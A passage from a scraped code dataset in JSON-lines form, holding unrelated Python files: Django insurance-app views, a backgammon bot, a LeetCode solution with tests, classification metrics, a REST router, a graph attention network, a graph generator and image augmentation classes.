= user.email\n mail_subject = 'Результат замовлення № ' + str(order.id)\n filepath_result = order.result_file\n message = render_to_string('insurance_app/send_result.html', {\n 'user': user,\n 'domain': settings.DEFAULT_DOMAIN,\n })\n email = EmailMessage(\n mail_subject, message, to=[user_email]\n )\n email.attach_file(filepath_result)\n email.attach_file(filepath_act)\n email.attach_file(filepath_bill)\n email.send()\n return redirect('insurance_app:index')\n else:\n file_path = \"insurance_app/xlsx_files/r3_32717175.xlsx\"\n data = pandas.read_excel(file_path, 'Лист1', usecols=\"C\")\n new_data = data.to_dict('index')\n print(new_data)\n output_data = new_data[1]['Всього:'] + 5\n order = Order.objects.get(id = order_id)\n order.enough_data = True\n order.done = True\n order.result_file = 'insurance_app/result_files_sended/result_'+order.company_info.IM_NUMIDENT+'_'+order.calc_type+'_'+str(order.reporting_date)+'.txt'\n order.save()\n with open('insurance_app/result_files_sended/result_'+order.company_info.IM_NUMIDENT+'_'+order.calc_type+'_'+str(order.reporting_date)+'.txt', 'w') as f:\n f.write(str(output_data))\n with open('insurance_app/act_files_sended/act_'+order.company_info.IM_NUMIDENT+'_'+order.calc_type+'_'+str(order.reporting_date)+'.txt', 'w') as f:\n f.write(\"ACT\"+order.company_info.IM_NUMIDENT)\n tmp1 = Documents(user=request.user, company_info = order.company_info, type_of_contract='act', order_id = order.id,\n file_location_sended = 'insurance_app/act_files_sended/act_'+order.company_info.IM_NUMIDENT+'_'+order.calc_type+'_'+str(order.reporting_date)+'.txt',\n signed_by_us = True)\n tmp1.save()\n with open('insurance_app/bill_files_sended/bill_'+order.company_info.IM_NUMIDENT+'_'+order.calc_type+'_'+str(order.reporting_date)+'.txt', 'w') as f:\n f.write(\"BILL\"+order.company_info.IM_NUMIDENT)\n tmp2 = Documents(user=request.user, company_info=order.company_info, type_of_contract='bill', order_id=order.id,\n file_location_sended='insurance_app/bill_files_sended/bill_' + order.company_info.IM_NUMIDENT + '_' + order.calc_type + '_' + str(\n order.reporting_date) + '.txt',\n signed_by_us=True, full_payment_amount = 500.0, current_payment_amount = 0.0)\n tmp2.save()\n context = {'output_data': output_data, 'order_id': order_id}\n return HttpResponse(template.render(context, request))\n\n\ndef show_count_error(request, order_id, reason):\n template = loader.get_template('insurance_app/show_count_error.html')\n if reason == 'not_enough_data':\n error = 'Не вистачає даних Розділу 3 для цього виду розрахунку.' \\\n ' Будь ласка, перейдіть у вкладку \"Завантаження\" та завантажте Розділ 3'\n context = {'error': error}\n return HttpResponse(template.render(context, request))\n\ndef order_history(request):\n template = loader.get_template('insurance_app/order_history.html')\n user = request.user\n try:\n session_company = request.session['company_IM_NUMIDENT']\n user_company = CompanyInfo.objects.get(IM_NUMIDENT = session_company)\n except:\n session_company = None\n user_company = None\n if user_company:\n user_orders = Order.objects.order_by(\"-order_date\").filter(\n Q(user=user, company_info = user_company, active=True) | Q(user=user, company_info = user_company, offered=True, rejected=True))\n else:\n user_orders = None\n context = {\n 'user_orders': user_orders,\n 'session_company': session_company,\n 'user_company' : user_company,\n }\n return HttpResponse(template.render(context, request))\n\ndef show_order(request, order_id):\n template = loader.get_template('insurance_app/show_order.html')\n user = request.user\n IM_NUMIDENT = request.session['company_IM_NUMIDENT']\n try:\n order = Order.objects.get(id=order_id)\n if order.user == user and order.company_info.IM_NUMIDENT == IM_NUMIDENT:\n user_flag = True\n else:\n user_flag = False\n with open('insurance_app/result_files_sended/result_' + order.company_info.IM_NUMIDENT + '_'\n + order.calc_type + '_' + str(order.reporting_date) + '.txt', 'r') as f:\n file_info = f.read()\n except:\n order = None\n user_flag = None\n file_info = None\n context = {'order': order, 'user_flag': user_flag, 'file_info': file_info}\n return HttpResponse(template.render(context, request))\n\ndef reject_order(request, order_id):\n order = Order.objects.get(id=order_id)\n order.rejected = True\n order.order_date = datetime.datetime.now()\n order.save()\n return redirect('insurance_app:order', order_id = 0)\n\ndef order_offered(request):\n template = loader.get_template('insurance_app/order_offered.html')\n user = request.user\n try:\n session_company = request.session['company_IM_NUMIDENT']\n user_company = CompanyInfo.objects.get(IM_NUMIDENT = session_company)\n except:\n session_company = None\n user_company = None\n if session_company:\n user_orders_offered = Order.objects.order_by(\"-order_date\").filter(user=user,company_info = user_company,\n offered=True,rejected=False,active=False)\n else: user_orders_offered = None\n print(user_orders_offered)\n context = {\n 'user_orders_offered' : user_orders_offered,\n 'session_company': session_company,\n 'user_company': user_company\n }\n return HttpResponse(template.render(context, request))\n\ndef csrf_failure(request, reason=\"\"):\n ctx = {'message': 'Виникла помилка. Перевірте, чи підключені cookies у вашому браузері або перезавантажте сторінку, або спробуйте увійти ще раз'}\n return render(request, 'insurance_app/csrf_failure.html', ctx)\n\ndef documents(request, IM_NUMIDENT):\n template = loader.get_template('insurance_app/documents.html')\n company_documents = Documents.objects.filter(company_info = IM_NUMIDENT).order_by(\"order_id\")\n company_name = CompanyInfo.objects.get(IM_NUMIDENT = IM_NUMIDENT).IAN_FULL_NAME\n context = {\n 'company_documents': company_documents,\n 'company_name': company_name,\n }\n return HttpResponse(template.render(context, request))\n\ndef tryx(request):\n template = loader.get_template('insurance_app/try.html')\n return render(request, 'insurance_app/try.html')","repo_name":"strahovanie/django_insurance","sub_path":"insurance_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32815122182","text":"from .move_search_utils import search_possible_moves\nfrom .bot import Bot\nfrom copy import deepcopy\nfrom itertools import product\n\nclass BotBase(Bot):\n def __init__(self, player_color):\n self.player = player_color\n\n self.init_parameters()\n\n def init_parameters(self):\n self.depth = 1\n self.evaluation_functions = [(1, self.sum_dist)]\n\n def sum_dist(self, board, player):\n \"\"\" Sample evauluation function, the parameters are\n always the same. The function should return a value\n between 0 and 1 inclusively. \n 1 - position good for player\n 0 - position bad for player \"\"\"\n\n board.set_player_perspective(player)\n result = 0\n worst_dist_sum = 24 * 15\n\n for i in range(len(board.spikes)):\n if board.spikes[i][0] != 0 and \\\n board.spikes[i][1] == player:\n result += (24 - i) * board.spikes[i][0]\n \n return 1 - result / worst_dist_sum\n\n @staticmethod\n def opponent(player):\n opponents = {\n 'W' : 'B',\n 'B' : 'W'\n }\n return opponents[player]\n\n def board_value(self, board, player):\n weight_sum = sum([ev_fn[0] for ev_fn in\n self.evaluation_functions])\n return sum([fn[1](board, player) * fn[0] / weight_sum for fn in\n self.evaluation_functions]) \n\n def relative_board_value(self, board, player):\n # higher better\n return self.board_value(board, player) / \\\n self.board_value(board, BotBase.opponent(player))\n\n def make_moves(self, board, dice_results):\n moves_choosen = self.choose_moves(board, self.player,\n dice_results, self.depth)\n # TODO use the moves info to change the bot state\n\n # return the actual move from (score, moves) tuple\n return moves_choosen[1]\n\n def exec_move(self, board, move):\n if move[1] != None:\n if move[1] == (-1):\n board.remove_checker_from_bar()\n board.push_player_checker(move[2] - 1)\n elif move[1] + move[2] < 24:\n board.move_checker(move[1] + move[2], move[1])\n else:\n board.pop_player_checker(move[1])\n return [move]\n else:\n return []\n\n\n def choose_moves(self, board, player, dice_results, depth):\n result_moves = []\n result_score = 0\n\n if len(dice_results) > 2:\n # dices are the same - don't care about the order\n board_copy = deepcopy(board)\n board_copy.set_player_perspective(player)\n\n for _ in range(4):\n move = self.choose_move(board_copy, player, dice_results[0], depth)\n result_moves += self.exec_move(board_copy, move)\n result_score = self.relative_board_value(board_copy, player)\n\n else:\n board_one, board_two = deepcopy(board), deepcopy(board)\n board_one_moves, board_two_moves = [], []\n board_one.set_player_perspective(player)\n board_two.set_player_perspective(player)\n \n move = self.choose_move(board_one, player, dice_results[0], depth)\n board_one_moves += self.exec_move(board_one, move)\n\n move = self.choose_move(board_one, player, dice_results[1], depth)\n board_one_moves += self.exec_move(board_one, move)\n\n # dices used in the reversed order\n move = self.choose_move(board_two, player, dice_results[1], depth)\n board_two_moves += self.exec_move(board_two, move)\n\n move = self.choose_move(board_two, player, dice_results[0], depth)\n board_two_moves += self.exec_move(board_two, move)\n\n board_one_val = self.relative_board_value(board_one, player)\n board_two_val = self.relative_board_value(board_two, player)\n if board_one_val > board_two_val:\n result_moves = board_one_moves\n result_score = board_one_val\n else:\n result_moves = board_two_moves\n result_score = board_two_val\n\n return (result_score, result_moves)\n\n def all_possible_dice_rolls(self):\n # TODO\n # should not be generated each time\n all_pairs = list(product(range(1,7), repeat=2))\n all_pairs = map(list, all_pairs)\n all_pairs = list(all_pairs)\n for i in range(len(all_pairs)):\n if all_pairs[i][0] == all_pairs[i][1]:\n all_pairs[i] = all_pairs[i] + all_pairs[i]\n return all_pairs\n\n def choose_move(self, board, player, dice_result, depth):\n possible_moves = search_possible_moves(board, player,\n dice_result)\n\n best_move, best_move_score = None, 0\n\n for possible_move in possible_moves:\n tmp_board = deepcopy(board)\n if possible_move == (-1):\n tmp_board.remove_checker_from_bar()\n tmp_board.push_player_checker(dice_result - 1)\n elif possible_move + dice_result < 24:\n tmp_board.move_checker(possible_move + dice_result,\n possible_move)\n else:\n tmp_board.pop_player_checker(possible_move)\n\n if depth > 0:\n all_possibilities = self.all_possible_dice_rolls()\n for dice_roll in all_possibilities:\n result, _ = self.choose_moves(tmp_board,\n BotBase.opponent(player), dice_roll, depth-1)\n if result > best_move_score:\n best_move_score = result\n best_move = possible_move\n else:\n result = self.relative_board_value(tmp_board, player)\n if result > best_move_score:\n best_move_score = result\n best_move = possible_move\n\n return (player, best_move, dice_result)\n\n\n\n","repo_name":"knight-erraunt/backgammon","sub_path":"backgammon/bots/bot_base.py","file_name":"bot_base.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18405620619","text":"import unittest\nfrom collections import deque\nfrom typing import List\ndef get_sol_obj(): return Solution()\nclass Solution:\n # https://leetcode.com/problems/wiggle-sort-ii/discuss/155764/Python-3-lines-simplest-solution-for-everyone-to-understand\n # bad solution\n # time O(n log n) space (n)\n def wiggleSort(self, nums: List[int]) -> None:\n n=len(nums)\n res = sorted(nums)\n i=n-1\n for idx in range(1,n,2):\n nums[idx]=res[i]\n i-=1\n i=0\n for idx in reversed(range(0,n,2)):\n nums[idx]=res[i]\n i+=1\nclass tester(unittest.TestCase):\n def test1(self):\n nums = [1,5,1,1,6,4]\n Output= [1,6,1,5,1,4]\n get_sol_obj().wiggleSort(nums)\n self.assertEqual(Output,nums)\n def test2(self):\n nums = [1,3,2,2,3,1]\n Output= [2,3,1,3,1,2]\n get_sol_obj().wiggleSort(nums)\n self.assertEqual(Output,nums)\n def test3(self):\n nums = [4,5,5,6]\n Output= [5,6,4,5]\n get_sol_obj().wiggleSort(nums)\n self.assertEqual(Output,nums)\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc324.py","file_name":"lc324.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73030771573","text":"import numpy as np\nfrom sklearn.metrics import precision_score\nfrom . import validate\n\n\n@validate.proportion\ndef precision_at(y_true, y_score, proportion, ignore_nas=False):\n '''\n Calculates precision at a given proportion.\n Only supports binary classification.\n '''\n # Sort scores in descending order\n scores_sorted = np.sort(y_score)[::-1]\n\n # Based on the proportion, get the index to split the data\n # if value is negative, return 0\n cutoff_index = max(int(len(y_true) * proportion) - 1, 0)\n # Get the cutoff value\n cutoff_value = scores_sorted[cutoff_index]\n\n # Convert scores to binary, by comparing them with the cutoff value\n scores_binary = np.array([int(y >= cutoff_value) for y in y_score])\n # Calculate precision using sklearn function\n if ignore_nas:\n precision = __precision(y_true, scores_binary)\n else:\n precision = precision_score(y_true, scores_binary)\n\n return precision, cutoff_value\n\n\n@validate.proportion\ndef __threshold_at(y_score, proportion):\n # Sort scores in descending order\n scores_sorted = np.sort(y_score)[::-1]\n # Based on the proportion, get the index to split th\n # if value is negative, return 0\n threshold_index = max(int(len(y_score) * proportion) - 1, 0)\n # Get the cutoff value\n threshold_value = scores_sorted[threshold_index]\n return threshold_value\n\n\n@validate.proportion\ndef __binarize_scores_at(y_score, proportion):\n threshold_value = __threshold_at(y_score, proportion)\n y_score_binary = np.array([int(y >= threshold_value) for y in y_score])\n return y_score_binary\n\n\ndef __precision(y_true, y_pred):\n '''\n Precision metric tolerant to unlabeled data in y_true,\n NA values are ignored for the precision calculation\n '''\n # make copies of the arrays to avoid modifying the original ones\n y_true = np.copy(y_true)\n y_pred = np.copy(y_pred)\n\n # precision = tp/(tp+fp)\n # True nehatives do not affect precision value, so for every missing\n # value in y_true, replace it with 0 and also replace the value\n # in y_pred with 0\n is_nan = np.isnan(y_true)\n y_true[is_nan] = 0\n y_pred[is_nan] = 0\n precision = precision_score(y_true, y_pred)\n return precision\n\n\n@validate.proportion\ndef tp_at(y_true, y_score, proportion):\n y_pred = __binarize_scores_at(y_score, proportion)\n tp = (y_pred == 1) & (y_true == 1)\n return tp.sum()\n\n\n@validate.proportion\ndef fp_at(y_true, y_score, proportion):\n y_pred = __binarize_scores_at(y_score, proportion)\n fp = (y_pred == 1) & (y_true == 0)\n return fp.sum()\n\n\n@validate.proportion\ndef tn_at(y_true, y_score, proportion):\n y_pred = __binarize_scores_at(y_score, proportion)\n tn = (y_pred == 0) & (y_true == 0)\n return tn.sum()\n\n\n@validate.proportion\ndef fn_at(y_true, y_score, proportion):\n y_pred = __binarize_scores_at(y_score, proportion)\n fn = (y_pred == 0) & (y_true == 1)\n return fn.sum()\n\n\n@validate.proportion\ndef labels_at(y_true, y_score, proportion, normalize=False):\n '''\n Return the number of labels encountered in the top X proportion\n '''\n # Get indexes of scores sorted in descending order\n indexes = np.argsort(y_score)[::-1]\n\n # Sort true values in the same order\n y_true_sorted = y_true[indexes]\n\n # Grab top x proportion of true values\n cutoff_index = max(int(len(y_true_sorted) * proportion) - 1, 0)\n # add one to index to grab values including that index\n y_true_top = y_true_sorted[:cutoff_index+1]\n\n # Count the number of non-nas in the top x proportion\n # we are returning a count so it should be an int\n values = int((~np.isnan(y_true_top)).sum())\n\n if normalize:\n values = float(values)/(~np.isnan(y_true)).sum()\n\n return values\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/edublancas_sklearn-evaluation/sklearn-evaluation-master/sklearn_evaluation/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"1645438511","text":"from rest_framework.routers import SimpleRouter, Route\n\n\nclass HypermediaRouter(SimpleRouter):\n routes = [\n Route(\n url=r'^{prefix}{trailing_slash}$',\n mapping={\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'post': 'process',\n 'delete': 'destroy',\n },\n name='{basename}',\n initkwargs={},\n ),\n Route(\n url=r'^{prefix}/{lookup}{trailing_slash}$',\n mapping={\n 'get': 'retrieve_model',\n 'put': 'update_model',\n 'patch': 'partial_update_model',\n 'post': 'process_model',\n 'delete': 'destroy_model',\n },\n name='{basename}',\n initkwargs={},\n ),\n ]\n","repo_name":"jcassee/registronavale","sub_path":"drf_hal/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"1799761032","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nclass GAT(nn.Module):\n\n def __init__(self, input_size, output_size, K, dropout=0.6):\n super(GAT, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.K = K\n self.dropout = dropout\n\n \"\"\"\n Registering W and a as `Parameters` means that forward operations on them will be tracked\n so that a backwards (optimizing) pass can be derived. See the function `train()` at the\n bottom of this module for how easy pytorch makes this.\n \"\"\"\n self.W = nn.Parameter(torch.rand(K, output_size, input_size))\n self.a = nn.Parameter(torch.rand(K, 1, 2*output_size))\n\n def forward(self, X, adj):\n \"\"\"Expecting to be passed the entire graph in X.\"\"\"\n results = torch.empty(0, self.output_size * self.K)\n for i, x in enumerate(X):\n multi_head_results = torch.empty(1, 0)\n for k in range(self.K):\n one_head_result = F.elu(self.compute_embedding(X, i, k, adj))\n multi_head_results = torch.cat((multi_head_results, one_head_result), dim=1)\n results = torch.cat((results, multi_head_results), dim=0)\n return results\n\n def compute_embedding(self, X, i, k, adj):\n \"\"\"Compute the k'th embedding of the i'th node\"\"\"\n a = self.a[k]\n W = self.W[k]\n x = X[i]\n\n # Construct a matrix where each row is the mapped result of x and\n # one of its neighbours concated.\n neighbours = X[self.sample_neighborhood(i, adj)].view(-1, self.input_size)\n mapped_neighbours = neighbours.mm(W.t())\n mapped_x_repeat = x.view(1, -1).mm(W.t()).repeat(neighbours.shape[0], 1)\n neighbour_cat_x = torch.cat((mapped_x_repeat, mapped_neighbours), dim=1)\n\n # Compute the weights given to each of the neighbours based on\n # the attention function.\n attention = F.softmax(F.leaky_relu(neighbour_cat_x.mm(a.t())), dim=0)\n attention = F.dropout(attention, self.dropout, training=self.training)\n\n # Combine mapped neighbours based on attention weighting.\n return (mapped_neighbours.t().mm(attention)).t()\n\n def sample_neighborhood(self, i, adj):\n \"\"\"Currently return all neighbours\"\"\"\n return adj[i].coalesce().indices()\n\nclass GATFinal(GAT):\n def __init__(self, input_size, output_size, K):\n super(GATFinal, self).__init__(input_size, output_size, K)\n\n def forward(self, X, adj):\n \"\"\"\n Instead of concatenating the results, they should be averaged for predictions\n \"\"\"\n results = torch.empty(0, self.output_size)\n for i, x in enumerate(X):\n multi_head_results = torch.empty(1, 0)\n for k in range(self.K):\n one_head_result = self.compute_embedding(X, i, k, adj)\n multi_head_results = torch.cat((multi_head_results, one_head_result), dim=1)\n\n avg_results = (1/self.K) * sum(torch.chunk(multi_head_results.view(-1,), self.K))\n results = torch.cat((results, avg_results.view(1,self.output_size)), dim=0)\n\n return F.softmax(results, dim=1)\n\n\n# A simple function to train a net.\ndef train(net, X, y, lr=0.00000001, iters=100):\n optimizer = optim.SGD(net.parameters(), lr=lr)\n criterion = nn.MSELoss()\n for i in range(iters):\n optimizer.zero_grad()\n output = net.forward(X)\n loss = criterion(output, y)\n print(loss)\n loss.backward()\n optimizer.step()\n","repo_name":"agpar/reddit_rep2","sub_path":"machine_learning/archive/gat.py","file_name":"gat.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30002323593","text":"import sys\nimport random\n\ndef gerar_arestas_aleatorias(num_vertices, num_arestas, cap_minima, cap_maxima):\n aleatorios = set()\n\n dict_arestas = {}\n while(num_arestas > 0):\n res = random.sample(range(0, num_vertices), 2)\n peso = random.randint(cap_minima, cap_maxima)\n key = (res[0], res[1], peso)\n invert_key = (res[1], res[0], peso)\n if (key not in dict_arestas and invert_key not in dict_arestas):\n dict_arestas[key] = peso\n aresta = (res[0], res[1], peso)\n aleatorios.add(aresta)\n num_arestas -= 1\n \n return aleatorios\n\n\nif __name__ == \"__main__\":\n if (len(sys.argv) < 6):\n print(\"Arquivo saida, numero de vertices, numero de arestas necessarios, capacidade minima, capacidade maxima\")\n exit(0)\n \n nome_arquivo = sys.argv[1]\n num_vertices = int(sys.argv[2])\n num_arestas = int(sys.argv[3])\n capacidade_minima = int(sys.argv[4])\n capacidade_maxima = int(sys.argv[5])\n\n arestas = gerar_arestas_aleatorias(\n num_vertices, num_arestas, \n capacidade_minima, capacidade_maxima\n )\n\n s = str(random.randint(0, num_vertices-1))\n t = str(random.randint(0, num_vertices-1))\n while (s == t):\n t = str(random.randint(0, num_vertices-1))\n\n texto = \"\"\n texto += str(num_vertices)\n texto += '\\n'\n texto += str(s)\n texto += \" \"\n texto += str(t)\n texto += \" \"\n texto += str(len(arestas))\n texto += \"\\n\"\n\n for v1, v2, peso in arestas:\n texto += str(v1) \n texto += \" \" \n texto += str(v2) \n texto += \" \" \n texto += str(peso) \n texto += \"\\n\"\n\n texto += \"0\"\n\n with open(nome_arquivo, \"w\") as saida:\n saida.write(texto)","repo_name":"thuzax/ED-2020","sub_path":"listas-de-exercicios/lista-8/gerador.py","file_name":"gerador.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11772656362","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: Donny You (youansheng@gmail.com)\n# Image Augmentations implemented by PIL.Image. Including RandomPad, RandomRotate, RandomResize etc.\n\n\nimport collections\nimport random\nimport math\nimport cv2\nimport matplotlib\nimport numpy as np\nfrom PIL import Image, ImageFilter, ImageOps\n\n\nclass RandomPad(object):\n \"\"\"Random Pad a ``PIL.Image``\n\n Args:\n inputs: All elements that need to be processed.\n up_scale_range: (list): the padding scale range of the image.\n mean: (list): the mean pixel value.\n ratio: the ratio of random pad.\n\n Returns:\n Outputs: All elements that have been processed.\n \"\"\"\n def __init__(self, up_scale_range=None, ratio=0.5, mean=(104, 117, 123)):\n assert isinstance(up_scale_range, (list, tuple))\n self.up_scale_range = up_scale_range\n self.ratio = ratio\n self.mean = tuple(mean)\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n ws = random.uniform(self.up_scale_range[0], self.up_scale_range[1])\n hs = ws\n for _ in range(50):\n scale = random.uniform(self.up_scale_range[0], self.up_scale_range[1])\n min_ratio = max(0.5, 1. / scale / scale)\n max_ratio = min(2, scale * scale)\n ratio = math.sqrt(random.uniform(min_ratio, max_ratio))\n ws = scale * ratio\n hs = scale / ratio\n if ws >= 1 and hs >= 1:\n break\n\n pad_width = random.randint(0, int(ws * width) - width)\n pad_height = random.randint(0, int(hs * height) - height)\n left_pad = random.randint(0, pad_width)\n up_pad = random.randint(0, pad_height)\n right_pad = pad_width - left_pad\n down_pad = pad_height - up_pad\n if not isinstance(img, list):\n img = ImageOps.expand(img, (left_pad, up_pad, right_pad, down_pad), fill=self.mean)\n else:\n img = [ImageOps.expand(item, (left_pad, up_pad, right_pad, down_pad), fill=self.mean) for item in img]\n\n if labelmap is not None:\n labelmap = ImageOps.expand(labelmap, (left_pad, up_pad, right_pad, down_pad), fill=255)\n\n if maskmap is not None:\n maskmap = ImageOps.expand(maskmap, (left_pad, up_pad, right_pad, down_pad), fill=1)\n\n if polygons is not None:\n for object_id in range(len(polygons)):\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] += left_pad\n polygons[object_id][polygon_id][1::2] += up_pad\n\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] += left_pad\n kpts[:, :, 1] += up_pad\n\n if bboxes is not None and bboxes.size > 0:\n bboxes[:, 0::2] += left_pad\n bboxes[:, 1::2] += up_pad\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomBorder(object):\n \"\"\" Padding the Image to proper size.\n Args:\n stride: the stride of the network.\n pad_value: the value that pad to the image border.\n img: Image object as input.\n Returns::\n img: Image object.\n \"\"\"\n def __init__(self, pad=None, ratio=0.5, mean=(104, 117, 123), allow_outside_center=True):\n self.pad = pad\n self.ratio = ratio\n self.mean = tuple(mean)\n self.allow_outside_center = allow_outside_center\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n left_pad, up_pad, right_pad, down_pad = self.pad\n target_size = [width + left_pad + right_pad, height + up_pad + down_pad]\n offset_left = -left_pad\n offset_up = -up_pad\n\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] -= offset_left\n kpts[:, :, 1] -= offset_up\n mask = np.logical_or.reduce((kpts[:, :, 0] >= target_size[0], kpts[:, :, 0] < 0,\n kpts[:, :, 1] >= target_size[1], kpts[:, :, 1] < 0))\n kpts[mask == 1, 2] = -1\n\n if bboxes is not None and bboxes.size > 0:\n if self.allow_outside_center:\n mask = np.ones(bboxes.shape[0], dtype=bool)\n else:\n crop_bb = np.array([offset_left, offset_up, offset_left + target_size[0], offset_up + target_size[1]])\n center = (bboxes[:, :2] + bboxes[:, 2:]) / 2\n mask = np.logical_and(crop_bb[:2] <= center, center < crop_bb[2:]).all(axis=1)\n\n bboxes[:, 0::2] -= offset_left\n bboxes[:, 1::2] -= offset_up\n bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, target_size[0] - 1)\n bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, target_size[1] - 1)\n\n mask = np.logical_and(mask, (bboxes[:, :2] < bboxes[:, 2:]).all(axis=1))\n bboxes = bboxes[mask]\n if labels is not None:\n labels = labels[mask]\n\n if polygons is not None:\n new_polygons = list()\n for object_id in range(len(polygons)):\n if mask[object_id] == 1:\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] -= offset_left\n polygons[object_id][polygon_id][1::2] -= offset_up\n polygons[object_id][polygon_id][0::2] = np.clip(polygons[object_id][polygon_id][0::2],\n 0, target_size[0] - 1)\n polygons[object_id][polygon_id][1::2] = np.clip(polygons[object_id][polygon_id][1::2],\n 0, target_size[1] - 1)\n\n new_polygons.append(polygons[object_id])\n\n polygons = new_polygons\n\n if not isinstance(img, list):\n img = ImageOps.expand(img, border=tuple(self.pad), fill=tuple(self.mean))\n else:\n img = [ImageOps.expand(item, border=tuple(self.pad), fill=tuple(self.mean)) for item in img]\n\n if maskmap is not None:\n maskmap = ImageOps.expand(maskmap, border=tuple(self.pad), fill=1)\n\n if labelmap is not None:\n labelmap = ImageOps.expand(labelmap, border=tuple(self.pad), fill=255)\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomHFlip(object):\n def __init__(self, swap_pair=None, ratio=0.5):\n self.swap_pair = swap_pair\n self.ratio = ratio\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n if not isinstance(img, list):\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n else:\n img = [item.transpose(Image.FLIP_LEFT_RIGHT) for item in img]\n\n if labelmap is not None:\n labelmap = labelmap.transpose(Image.FLIP_LEFT_RIGHT)\n labelmap_mode = labelmap.mode\n labelmap = np.asarray(labelmap)\n for pair in self.swap_pair:\n a_mask = (labelmap == pair[0])\n labelmap[labelmap == pair[1]] = pair[0]\n labelmap[a_mask] = pair[1]\n\n labelmap = Image.fromarray(labelmap, mode=labelmap_mode)\n\n if maskmap is not None:\n maskmap = maskmap.transpose(Image.FLIP_LEFT_RIGHT)\n\n if polygons is not None:\n for object_id in range(len(polygons)):\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] = width - 1 - polygons[object_id][polygon_id][0::2]\n\n if bboxes is not None and bboxes.size > 0:\n xmin = width - 1 - bboxes[:, 2]\n xmax = width - 1 - bboxes[:, 0]\n bboxes[:, 0] = xmin\n bboxes[:, 2] = xmax\n\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] = width - 1 - kpts[:, :, 0]\n\n for pair in self.swap_pair:\n temp_point = np.copy(kpts[:, pair[0] - 1])\n kpts[:, pair[0] - 1] = kpts[:, pair[1] - 1]\n kpts[:, pair[1] - 1] = temp_point\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomSaturation(object):\n def __init__(self, lower=0.5, upper=1.5, ratio=0.5):\n self.lower = lower\n self.upper = upper\n self.ratio = ratio\n assert self.upper >= self.lower, \"saturation upper must be >= lower.\"\n assert self.lower >= 0, \"saturation lower must be non-negative.\"\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n img = np.asarray(img).astype(np.float32)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n img[:, :, 1] *= random.uniform(self.lower, self.upper)\n img = cv2.cvtColor(img, cv2.COLOR_HSV2RGB)\n img = np.clip(img, 0, 255)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomHue(object):\n def __init__(self, delta=18, ratio=0.5):\n assert 0 <= delta <= 360\n self.delta = delta\n self.ratio = ratio\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n img = 